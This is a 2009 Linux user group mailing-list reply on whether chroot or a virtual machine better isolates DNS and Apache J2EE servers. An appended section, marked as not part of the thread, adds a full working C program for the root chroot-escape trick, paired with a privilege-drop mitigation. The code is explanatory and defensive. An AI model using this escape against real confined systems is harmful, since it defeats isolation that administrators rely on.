On Tue, Jul 28, 2009 at 11:56:52AM +0100, James Courtier-Dutton wrote:
> All I wish to run is a DNS bind server and an Apache J2EE application server.
> What real benefits will a virtual machine have over a chroot environment?
> I am on the side that says that chroot should be good enough.
> chroot makes much more effective use of filespace between multiple
> chroot environments.
As long as neither application is running as root, a chroot should be sufficient. However, once you have something running as root inside a chroot, it's trivial for it to break out of the chroot. (I forget the exact mechanism, but I think it's about two commands to do it, and it is expected and designed behaviour.)

You will also need to place limits on filesystem usage for the chroot users (quotas, or a separate filesystem for the chroot), as if they're cracked, the attacker could DoS by filling up the filesystem.

Finally, if you use a chroot, you're still vulnerable to a combination of a remote exploit to get into the chroot in the first place, and then a local root exploit to get out of it into the main system.

None of the above issues applies (so much) to a VM environment.

   Hugo.

-- 
=== Hugo Mills: h...@... carfax.org.uk | darksatanic.net | lug.org.uk ===
  PGP key: 515C238D from wwwkeys.eu.pgp.net or http://www.carfax.org.uk
  --- Great oxymorons of the world, no. 8: The Latest In Proven Technology ---
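Added example, not part of the original thread or anyone's posted code: the "about two commands" that Hugo refers to are the well-known chroot(2) re-entry trick, and the reason it needs root is that chroot() itself is a privileged call (CAP_SYS_CHROOT on Linux). chroot() changes the process's root directory but not its current directory, so a root process inside the jail can chroot() into a scratch subdirectory, leaving its cwd above the new root, walk chdir("..") up to the real "/" (the only place the kernel stops ".."), and chroot(".") to make that its root again. The program below does exactly that, and also shows the privilege drop the thread recommends, which makes the first chroot() fail with EPERM. The scratch directory name and the uid/gid passed to drop_root() are the caller's choice, not anything from the thread.

```c
/*
 * chroot escape as root, and the privilege drop that defeats it.
 * Added example for the Hampshire LUG thread above; not code from the thread.
 *
 * Build: cc -Wall -o chroot_escape chroot_escape.c
 * Run as root inside a chroot to see the escape; as an ordinary user the
 * first chroot() fails with EPERM, which is the point of not running the
 * jailed service as root.
 */
#define _DEFAULT_SOURCE
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <grp.h>
#include <stdio.h>
#include <sys/stat.h>
#include <unistd.h>

/* Crude stand-in for "holds CAP_SYS_CHROOT": effective uid 0. */
int can_escape(void)
{
    return geteuid() == 0;
}

/*
 * Try to escape the current chroot.  'scratch' (caller-chosen name) is a
 * directory created in the cwd and removed again afterwards.  Returns 0 on
 * success with the cwd restored, or -1 with errno set (EPERM when the
 * process is not allowed to call chroot()).
 */
int escape_chroot(const char *scratch)
{
    int saved_cwd = open(".", O_RDONLY | O_DIRECTORY);
    if (saved_cwd < 0)
        return -1;

    if (mkdir(scratch, 0700) != 0 && errno != EEXIST) {
        close(saved_cwd);
        return -1;
    }

    /* 1. Push the root down into scratch; our cwd is now outside the root. */
    if (chroot(scratch) != 0) {
        int saved_errno = errno;
        rmdir(scratch);
        close(saved_cwd);
        errno = saved_errno;
        return -1;
    }

    /* 2. Climb. ".." is only clamped at the real "/", not at the jail. */
    for (int depth = 0; depth < 64; depth++)
        if (chdir("..") != 0)
            break;

    /* 3. Make wherever we ended up (the real "/") the root again. */
    if (chroot(".") != 0) {
        int saved_errno = errno;
        close(saved_cwd);
        errno = saved_errno;
        return -1;
    }

    /* Restore cwd through the saved fd and remove the scratch directory. */
    if (fchdir(saved_cwd) == 0)
        rmdir(scratch);
    close(saved_cwd);
    return 0;
}

/*
 * The mitigation: give up root before serving requests.  Order matters
 * (supplementary groups, gid, then uid), and setuid(0) afterwards must fail
 * or the drop did not really happen.
 */
int drop_root(uid_t uid, gid_t gid)
{
    if (setgroups(0, NULL) != 0 || setgid(gid) != 0 || setuid(uid) != 0)
        return -1;
    if (setuid(0) == 0) {       /* root regained: drop was ineffective */
        errno = EPERM;
        return -1;
    }
    return 0;
}

int main(void)
{
    if (!can_escape())
        fprintf(stderr, "not root: chroot() will fail with EPERM, as intended\n");
    if (escape_chroot("escape_scratch") != 0) {
        perror("escape_chroot");
        return 1;
    }
    /* Anything visible only outside the jail proves the escape worked. */
    printf("root reset to real \"/\": /etc/passwd %s\n",
           access("/etc/passwd", F_OK) == 0 ? "visible" : "missing");
    return 0;
}
```

Running the same binary after drop_root() to an unprivileged uid/gid (for example the account the daemon should have been started under) makes escape_chroot() return -1 with EPERM, which is the behaviour the thread relies on. Note that this only closes the "running as root" hole; it does nothing about the quota and remote-plus-local-exploit points Hugo raises.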
-- 
Please post to: Hampshire@mailman.lug.org.uk
Web Interface: https://mailman.lug.org.uk/mailman/listinfo/hampshire
LUG URL: http://www.hantslug.org.uk
--------------------------------------------------------------